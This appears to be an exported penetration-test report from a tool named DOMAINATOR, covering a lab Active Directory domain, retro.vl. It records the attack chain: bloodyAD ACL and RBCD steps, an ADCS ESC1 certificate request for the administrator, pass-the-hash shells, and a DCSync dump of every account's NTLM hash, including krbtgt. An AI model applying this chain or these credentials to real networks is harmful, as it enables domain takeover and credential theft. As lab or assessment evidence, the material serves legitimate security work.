BUILTIN\Certificate Service DCOM Access      Alias            S-1-5-32-574                                 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users             Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization               Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group             
RETRO\Domain Admins                          Group            S-1-5-21-2983547755-698260136-4283918172-512 Mandatory group, Enabled by default, Enabled group             
RETRO\Group Policy Creator Owners            Group            S-1-5-21-2983547755-698260136-4283918172-520 Mandatory group, Enabled by default, Enabled group             
RETRO\Enterprise Admins                      Group            S-1-5-21-2983547755-698260136-4283918172-519 Mandatory group, Enabled by default, Enabled group             
RETRO\Schema Admins                          Group            S-1-5-21-2983547755-698260136-4283918172-518 Mandatory group, Enabled by default, Enabled group             
RETRO\Denied RODC Password Replication Group Alias            S-1-5-21-2983547755-698260136-4283918172-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication             Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level         Label            S-1-16-12288                                                                                                

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

═══════════════════════════════════════════════
Administrator👑 DA
═══════════════════════════════════════════════
  DOMAINATOR — Shell Evidence
  User: Administrator
  Target: 10.129.234.44
  Domain: retro.vl
  Method: WMIEXEC (NTLM)
  Hash: 123f689a8d551f42706ec952b1aeee9a
═══════════════════════════════════════════════

whoami
retro\administrator

Windows IP Configuration

   Host Name . . . . . . . . . . . . : DC
   Primary Dns Suffix  . . . . . . . : retro.vl
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : retro.vl
                                       .htb

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-94-60-CA
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::d54d:eae:e4a3:f5e4(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::823f:49f5:4782:4191%5(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.129.234.44(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Saturday, April 4, 2026 7:07:11 AM
   Lease Expires . . . . . . . . . . : Saturday, April 4, 2026 5:07:10 PM
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:c01e%5
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.10.10.2
   DHCPv6 IAID . . . . . . . . . . . : 385896534
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-31-62-D3-65-00-50-56-94-60-CA
   DNS Servers . . . . . . . . . . . : 1.1.1.1

═══════════════════════════════════════════════
Cmd Acl Abuse.Txt📄
bloodyAD get writable

distinguishedName: CN=TPM Devices,DC=retro,DC=vl
permission: CREATE_CHILD

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=retro,DC=vl
permission: WRITE

distinguishedName: CN=banking,CN=Computers,DC=retro,DC=vl
permission: CREATE_CHILD; WRITE
Cmd Adcs.Txt📄
[*] Requesting certificate via RPC
[*] Request ID is 88
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'admin.pfx'
[*] Wrote certificate and private key to 'admin.pfx'
[*] Requesting certificate via RPC
[*] Request ID is 89
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'admin.pfx'
File 'admin.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): [*] Wrote certificate and private key to 'admin.pfx'
Cmd Dcsync.Txt📄
Administrator:500:aad3b435b51404eeaad3b435b51404ee:123f689a8d551f42706ec952b1aeee9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e11fffd0ed83eedde12611fc2fbb8650:::
retro.vl\trainee:1104:aad3b435b51404eeaad3b435b51404ee:2a217a32bde94a23b26a8eea26c70874:::
retro.vl\jburley:1107:aad3b435b51404eeaad3b435b51404ee:25c3464d4e99d340122f3a360bbd7c6c:::
retro.vl\tblack:1109:aad3b435b51404eeaad3b435b51404ee:0adf9f3819565a0d0f3890290ecc3919:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:12c876af4deb1aedf56306edde6530b3:::
BANKING$:1106:aad3b435b51404eeaad3b435b51404ee:a0da35556323d8cc8bed2c4638cbaf28:::
Cmd Delegation.Txt📄
banking
Cmd Laps.Txt📄
Getting LAPS Passwords
No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !
Cmd Rbcd.Txt📄
bloodyAD set rbcd

banking
Cmd Services.Txt📄
[*] Requesting shares on 10.129.234.44.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Notes' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Trainees' is not writable.
Cmd Ticket Reuse.Txt📄
Ticket cache: FILE:administrator.ccache
Default principal: administrator@RETRO.VL

Valid starting     Expires            Service principal
05/04/26 02:10:32  05/04/26 12:10:32  krbtgt/RETRO.VL@RETRO.VL
	renew until 06/04/26 02:10:32

session setup failed: NT_STATUS_INVALID_PARAMETER
Jburley📄
═══════════════════════════════════════════════
  DOMAINATOR — Shell Evidence
  User: jburley
  Target: 10.129.234.44
  Domain: retro.vl
  Method: PSEXEC (NTLM)
  Hash: 25c3464d4e99d340122f3a360bbd7c6c
═══════════════════════════════════════════════

whoami
nt authority\system
DC

Windows IP Configuration

   Host Name . . . . . . . . . . . . : DC
   Primary Dns Suffix  . . . . . . . : retro.vl
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : retro.vl
                                       .htb

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-94-60-CA
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::d54d:eae:e4a3:f5e4(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::823f:49f5:4782:4191%5(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.129.234.44(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Saturday, April 4, 2026 7:07:12 AM
   Lease Expires . . . . . . . . . . : Saturday, April 4, 2026 5:07:11 PM
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:c01e%5
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.10.10.2
   DHCPv6 IAID . . . . . . . . . . . : 385896534
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-31-62-D3-65-00-50-56-94-60-CA
   DNS Servers . . . . . . . . . . . : 1.1.1.1
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

═══════════════════════════════════════════════
Attack Evidence
[*] Requesting certificate via RPC
[*] Request ID is 88
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'admin.pfx'
[*] Wrote certificate and private key to 'admin.pfx'
[*] Requesting certificate via RPC
[*] Request ID is 89
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'admin.pfx'
File 'admin.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): [*] Wrote certificate and private key to 'admin.pfx'
bloodyAD get writable


distinguishedName: CN=TPM Devices,DC=retro,DC=vl
permission: CREATE_CHILD

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=retro,DC=vl
permission: WRITE

distinguishedName: CN=banking,CN=Computers,DC=retro,DC=vl
permission: CREATE_CHILD; WRITE
// Active Directory attack graph
Domain Graph
BloodHound-style AD relationship map — all users, machines, groups, and privilege paths discovered during this engagement. Hover nodes to inspect edges. Double-click to pin. Scroll to zoom.
Loading graph data...
Legend
Owned / DA Member
High-Priv Group
Domain
DC
User / Computer
Group
Service Acct
Edges
Privilege
ACL
DCSync
LAPS / gMSA
MemberOf
Pre-Built Queries BloodHound-style analysis
Find all Domain Admins
Principals with MemberOf edge to Domain Admins group
U Administrator
U administrator OWNED
U jburley OWNED
Shortest Paths to Domain Admins from Owned Principals
BFS traversal from each owned node to Domain Admins — shows the minimum attack chain
krbtgt --[MemberOf]--> Domain Users --[MemberOf]--> administrator --[MemberOf]--> Domain Admins
banking$ --[ADCS ESC1]--> administrator --[MemberOf]--> Domain Admins
High Value Targets
Nodes with most inbound abusable edges (GenericAll, GenericWrite, DCSync, AllowedToAct, etc.)
T administrator (1 edges)
T banking$ (1 edges)
T RETRO.VL (1 edges)
T Domain Admins (1 edges)
Map All Abusable Relationships
All privilege escalation, ACL abuse, DCSync, and delegation edges in the graph
[PRIVILEGE] banking$ --[ADCS ESC1]--> administrator
[ACL] administrator --[GenericAll]--> banking$
[DELEGATION] administrator --[AllowedToAct]--> banking
[DCSYNC] administrator --[DCSync]--> RETRO.VL
[PRIVILEGE] administrator --[HasPrivilege]--> Domain Admins
Find Principals with DCSync Rights
Nodes with DCSync/AllExtendedRights edges to the domain
D administrator OWNED
Kerberoastable Users
Users with servicePrincipalName set (SPN-based attack surface)
No Kerberoastable users identified
Graph Statistics
Nodes: 29 | Edges: 30 | Owned users: 6 | Owned machines: 3
// Cross-domain relationships
Domain Trusts
Trust relationships between domains — lateral movement opportunities
DOMAIN TOPOLOGY
DOMAIN
RETRO.VL
DOMAIN CONTROLLER
DC
10.129.234.44
FOREST LEVEL
Windows Server 2016
DOMAIN SID
S-1-5-21-*
DOMAIN STATISTICS
6
USERS
4
MACHINES
17
GROUPS
8
COMPROMISED
TRUST RELATIONSHIPS
🔒
Single-Domain Environment
No external or forest trust relationships detected. This domain operates as an isolated forest root with no bidirectional or one-way trusts to external domains.
SECURITY POSTURE
Domain Compromise
Full domain compromise achieved. All account hashes extracted.
Lateral Movement Risk
Single domain — no cross-domain lateral movement possible. Internal privilege escalation was the primary attack vector.
Account Exposure
8 of 10 identities compromised (80% exposure rate).
Forest Isolation
No forest trusts detected. Attack surface is contained within the single domain boundary.
OS Distribution
Host OS Build
DCWindows Server 202220348
DCWindows Server 202220348
// High-value targets
Privileged Accounts
Domain Admins, service accounts, and accounts with special privileges
8
ACCOUNTS
1
DOMAIN ADMINS
8
COMPROMISED
2
MACHINES
IDENTITY TYPE NT HASH STATUS
👑
Administrator
DOMAIN ADMIN 123f689a8d551f42... OWNED
💀
krbtgt
GOLDEN TICKET e11fffd0ed83eedd... OWNED
👤
Guest
USER 31d6cfe0d16ae931... OWNED
👤
jburley
Domain Admins
USER 25c3464d4e99d340... OWNED
👤
tblack
HelpDesk
USER 0adf9f3819565a0d... OWNED
👤
trainee
USER 2a217a32bde94a23... OWNED
BANKING$
MACHINE a0da35556323d8cc... OWNED
DC$
MACHINE 12c876af4deb1aed... OWNED
⚠ krbtgt hash extracted — Golden Ticket attacks possible. Rotate krbtgt password TWICE immediately.
👥 Group Memberships (5 users in security-relevant groups)
User Groups
administratorAdministrators, Domain Admins, Enterprise Admins, Group Policy Creator Owners, Schema Admins
dc$Cert Publishers, Pre-Windows 2000 Compatible Access
guestGuests
jburleyDomain Admins
tblackHelpDesk
AdminCount=1 Accounts (3)
Administratorkrbtgtjburley
Password Age Per Account
Account Last Password Set Age
Administrator2026-04-05 01:29:270d
krbtgt2023-07-24 00:08:46986d STALE
trainee2023-07-24 00:26:01986d STALE
tblack2023-07-24 01:08:59986d STALE